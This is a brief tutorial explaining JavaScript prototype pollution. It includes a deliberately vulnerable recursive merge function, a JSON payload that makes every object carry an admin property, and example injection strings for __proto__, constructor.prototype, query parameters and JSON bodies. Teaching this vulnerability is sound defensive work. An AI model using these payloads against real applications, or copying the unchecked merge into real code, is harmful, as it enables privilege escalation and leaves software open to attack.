Prototype Pollution is a JavaScript vulnerability where attackers can modify the prototype of base objects (like Object.prototype), affecting all objects in the application. This can lead to denial of service, property injection, or in some cases, remote code execution.
JavaScript objects inherit properties from their prototype chain. If an attacker can set properties on Object.prototype, those properties become accessible on all objects, potentially overwriting expected values or injecting malicious ones.
// Vulnerable: recursive merge without prototype check
function merge(target, source) {
for (let key in source) {
if (typeof source[key] === 'object') {
target[key] = merge(target[key] || {}, source[key]);
} else {
target[key] = source[key];
}
}
return target;
}
// Attack payload
const malicious = JSON.parse('{"__proto__": {"admin": true}}');
merge({}, malicious);
// Now ALL objects have admin property!
const user = {};
console.log(user.admin); // true// Via __proto__
obj["__proto__"]["polluted"] = true;
// Via constructor.prototype
obj["constructor"]["prototype"]["polluted"] = true;
// In URL parameters (query-string parsing)
?__proto__[admin]=1
// In JSON body
{"__proto__": {"admin": true}}